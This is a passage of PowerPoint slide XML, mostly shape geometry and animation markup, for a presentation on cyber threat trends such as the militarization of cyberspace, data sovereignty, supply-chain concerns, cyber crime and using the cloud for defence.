                <a:ext cx="0" cy="2194560"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 0"/>
                  <a:gd name="connsiteY0" fmla="*/ 923925 h 923925"/>
                  <a:gd name="connsiteX1" fmla="*/ 0 w 0"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 923925"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path h="923925">
                    <a:moveTo>
                      <a:pt x="0" y="923925"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>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9" name="TextBox 198"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="201762" y="919379"/>
              <a:ext cx="3871189" cy="4616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noFill/>
                  </a:ln>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="2917">
                        <a:schemeClr val="tx2"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:schemeClr val="tx2"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>THREAT DATA SOURCES AND ANALYSIS TOOLS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle: Rounded Corners 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="201762" y="1001287"/>
            <a:ext cx="7781631" cy="3461581"/>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Rounded Corners 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9042155" y="1001287"/>
            <a:ext cx="3315965" cy="3461581"/>
          </a:xfrm>
          <a:prstGeom prst="round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p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9097718" y="811916"/>
            <a:ext cx="1369103" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="lin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7" name="Straight Connector 126"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10806752" y="811916"/>
            <a:ext cx="1369103" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="lin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716649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grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0 -6.12801E-7 L 0 0.04017 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="600" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="1997"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="42" presetClass="path" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.07965E-6 -2.67817E-6 L -4.07965E-6 0.04018 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="600" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="1997"/>
                                    </p:animMotion>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42" presetClass="path" presetSubtype="0" decel="100000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.82436E-6 -4.03995E-6 L 3.82436E-6 0.04018 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="600" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="1997"/>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22" presetClass="entr" presetSubtype="8"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fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="with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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="3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5" grpId="1"/>
      <p:bldP spid="4" grpId="0" animBg="1"/>
      <p:bldP spid="1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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3881910" y="2506803"/>
            <a:ext cx="9947769" cy="7692887"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14786619"/>
              <a:gd name="adj2" fmla="val 658867"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="111010" tIns="55505" rIns="111010" bIns="55505" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932563"/>
            <a:endParaRPr lang="en-US" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1"/>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Three Interacting Trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arc 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="14629972" flipH="1">
            <a:off x="7798270" y="-5173794"/>
            <a:ext cx="8730180" cy="10258637"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14449774"/>
              <a:gd name="adj2" fmla="val 398081"/>
            </a:avLst>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="111010" tIns="55505" rIns="111010" bIns="55505" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932563"/>
            <a:endParaRPr lang="en-US" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6065859" y="4106777"/>
            <a:ext cx="6369734" cy="2574307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="111010" tIns="55505" rIns="111010" bIns="55505" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="346891" lvl="1" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Militarization of cyber space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="813172" lvl="2" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The "5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> domain“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="813172" lvl="2" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The post-Snowden Global Cyber Catch Up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346891" lvl="1" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Geopolitics increasingly colors national views </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="813190" lvl="2" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data sovereignty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="813190" lvl="2" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Supply chain and preferred suppliers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346891" lvl="1" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber trickle down empowering cyber-crime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346891" lvl="1" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber crime bypassing the financial system (BTC)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2637345" y="1237926"/>
            <a:ext cx="4663017" cy="1806782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="111010" tIns="55505" rIns="111010" bIns="55505">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="soft" dir="t">
                <a:rot lat="0" lon="0" rev="10800000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d>
              <a:bevelT w="27940" h="12700"/>
              <a:contourClr>
                <a:srgbClr val="DDDDDD"/>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932563"/>
            <a:r>
              <a:rPr lang="en-US" sz="3599" b="1" kern="0" spc="150" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="25400" algn="tl" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>The Race for Mastery of the Cyber Domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1717331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We can use the cloud to protect itself</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10276681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bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12436475" cy="1851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Oval 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10482513" y="586120"/>
            <a:ext cx="914228" cy="914230"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:miter lim="800000"/>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8" name="Group 47"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10600135" y="236313"/>
            <a:ext cx="649224" cy="649224"/>
            <a:chOff x="6808507" y="4080546"/>
            <a:chExt cx="616862" cy="616862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Oval 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6808507" y="4080546"/>
              <a:ext cx="616862" cy="616862"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="003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0" name="Group 49"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6909296" y="4187537"/>
              <a:ext cx="405902" cy="340666"/>
              <a:chOff x="5951538" y="3273425"/>
              <a:chExt cx="533400" cy="447675"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5951538" y="3273425"/>
                <a:ext cx="533400" cy="447675"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 336 w 336"/>
                  <a:gd name="T1" fmla="*/ 282 h 282"/>
                  <a:gd name="T2" fmla="*/ 0 w 336"/>
                  <a:gd name="T3" fmla="*/ 282 h 282"/>
                  <a:gd name="T4" fmla="*/ 168 w 336"/>
                  <a:gd name="T5" fmla="*/ 0 h 282"/>
                  <a:gd name="T6" fmla="*/ 336 w 336"/>
                  <a:gd name="T7" fmla="*/ 282 h 282"/>
                  <a:gd name="T8" fmla="*/ 32 w 336"/>
                  <a:gd name="T9" fmla="*/ 264 h 282"/>
                  <a:gd name="T10" fmla="*/ 304 w 336"/>
                  <a:gd name="T11" fmla="*/ 264 h 282"/>
                  <a:gd name="T12" fmla="*/ 168 w 336"/>
                  <a:gd name="T13" fmla="*/ 37 h 282"/>
                  <a:gd name="T14" fmla="*/ 32 w 336"/>
                  <a:gd name="T15" fmla="*/ 264 h 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282">
                    <a:moveTo>
                      <a:pt x="336" y="282"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="282"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="32" y="264"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="304" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32"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Rectangle 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6203951" y="3417888"/>
                <a:ext cx="28575"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23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6203951" y="3630613"/>
                <a:ext cx="285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3" name="Group 92"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10064065" y="874935"/>
            <a:ext cx="830040" cy="830040"/>
            <a:chOff x="6808507" y="402164"/>
            <a:chExt cx="616862" cy="616862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Oval 93"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6808507" y="402164"/>
              <a:ext cx="616862" cy="61686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6994804" y="535745"/>
              <a:ext cx="244268" cy="328918"/>
              <a:chOff x="6057901" y="3281363"/>
              <a:chExt cx="320675" cy="431800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="96" name="Rectangle 5"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6057901" y="3482975"/>
                <a:ext cx="320675" cy="23018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6"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6105526" y="3281363"/>
                <a:ext cx="225425" cy="201613"/>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38" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11065252" y="965343"/>
            <a:ext cx="649224" cy="649224"/>
            <a:chOff x="6808507" y="5888561"/>
            <a:chExt cx="616862" cy="616862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Oval 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6808507" y="5888561"/>
              <a:ext cx="616862" cy="616862"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="003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0" name="Group 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6930502" y="6023664"/>
              <a:ext cx="372872" cy="346656"/>
              <a:chOff x="6015038" y="3308350"/>
              <a:chExt cx="406401" cy="377826"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6029326" y="3308350"/>
                <a:ext cx="392113" cy="188913"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 100 w 108"/>
                  <a:gd name="T1" fmla="*/ 32 h 52"/>
                  <a:gd name="T2" fmla="*/ 52 w 108"/>
                  <a:gd name="T3" fmla="*/ 0 h 52"/>
                  <a:gd name="T4" fmla="*/ 0 w 108"/>
                  <a:gd name="T5" fmla="*/ 52 h 52"/>
                  <a:gd name="T6" fmla="*/ 8 w 108"/>
                  <a:gd name="T7" fmla="*/ 52 h 52"/>
                  <a:gd name="T8" fmla="*/ 52 w 108"/>
                  <a:gd name="T9" fmla="*/ 8 h 52"/>
                  <a:gd name="T10" fmla="*/ 93 w 108"/>
                  <a:gd name="T11" fmla="*/ 36 h 52"/>
                  <a:gd name="T12" fmla="*/ 80 w 108"/>
                  <a:gd name="T13" fmla="*/ 36 h 52"/>
                  <a:gd name="T14" fmla="*/ 80 w 108"/>
                  <a:gd name="T15" fmla="*/ 44 h 52"/>
                  <a:gd name="T16" fmla="*/ 108 w 108"/>
                  <a:gd name="T17" fmla="*/ 44 h 52"/>
                  <a:gd name="T18" fmla="*/ 108 w 108"/>
                  <a:gd name="T19" fmla="*/ 16 h 52"/>
                  <a:gd name="T20" fmla="*/ 100 w 108"/>
                  <a:gd name="T21" fmla="*/ 16 h 52"/>
                  <a:gd name="T22" fmla="*/ 100 w 108"/>
                  <a:gd name="T2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52">
                    <a:moveTo>
                      <a:pt x="100" y="32"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="13"/>
                      <a:pt x="73" y="0"/>
                      <a:pt x="52" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="0" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="52"/>
                      <a:pt x="8" y="52"/>
                      <a:pt x="8" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="28"/>
                      <a:pt x="28" y="8"/>
                      <a:pt x="52" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="8"/>
                      <a:pt x="86" y="19"/>
                      <a:pt x="93" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="36"/>
                      <a:pt x="80" y="36"/>
                      <a:pt x="80" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="44"/>
                      <a:pt x="80" y="44"/>
                      <a:pt x="80" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="108" y="44"/>
                      <a:pt x="108" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="16"/>
                      <a:pt x="100" y="16"/>
                      <a:pt x="100" y="16"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10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33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6015038" y="3497263"/>
                <a:ext cx="392113" cy="188913"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 56 w 108"/>
                  <a:gd name="T1" fmla="*/ 44 h 52"/>
                  <a:gd name="T2" fmla="*/ 15 w 108"/>
                  <a:gd name="T3" fmla="*/ 16 h 52"/>
                  <a:gd name="T4" fmla="*/ 28 w 108"/>
                  <a:gd name="T5" fmla="*/ 16 h 52"/>
                  <a:gd name="T6" fmla="*/ 28 w 108"/>
                  <a:gd name="T7" fmla="*/ 8 h 52"/>
                  <a:gd name="T8" fmla="*/ 0 w 108"/>
                  <a:gd name="T9" fmla="*/ 8 h 52"/>
                  <a:gd name="T10" fmla="*/ 0 w 108"/>
                  <a:gd name="T11" fmla="*/ 36 h 52"/>
                  <a:gd name="T12" fmla="*/ 8 w 108"/>
                  <a:gd name="T13" fmla="*/ 36 h 52"/>
                  <a:gd name="T14" fmla="*/ 8 w 108"/>
                  <a:gd name="T15" fmla="*/ 20 h 52"/>
                  <a:gd name="T16" fmla="*/ 56 w 108"/>
                  <a:gd name="T17" fmla="*/ 52 h 52"/>
                  <a:gd name="T18" fmla="*/ 108 w 108"/>
                  <a:gd name="T19" fmla="*/ 0 h 52"/>
                  <a:gd name="T20" fmla="*/ 100 w 108"/>
                  <a:gd name="T21" fmla="*/ 0 h 52"/>
                  <a:gd name="T22" fmla="*/ 56 w 108"/>
                  <a:gd name="T23"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52">
                    <a:moveTo>
                      <a:pt x="56" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="44"/>
                      <a:pt x="22" y="33"/>
                      <a:pt x="15" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="16"/>
                      <a:pt x="28" y="16"/>
                      <a:pt x="28" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="8"/>
                      <a:pt x="28" y="8"/>
                      <a:pt x="28" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="8"/>
                      <a:pt x="0" y="8"/>
                      <a:pt x="0" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="36"/>
                      <a:pt x="0" y="36"/>
                      <a:pt x="0" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="36"/>
                      <a:pt x="8" y="36"/>
                      <a:pt x="8" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
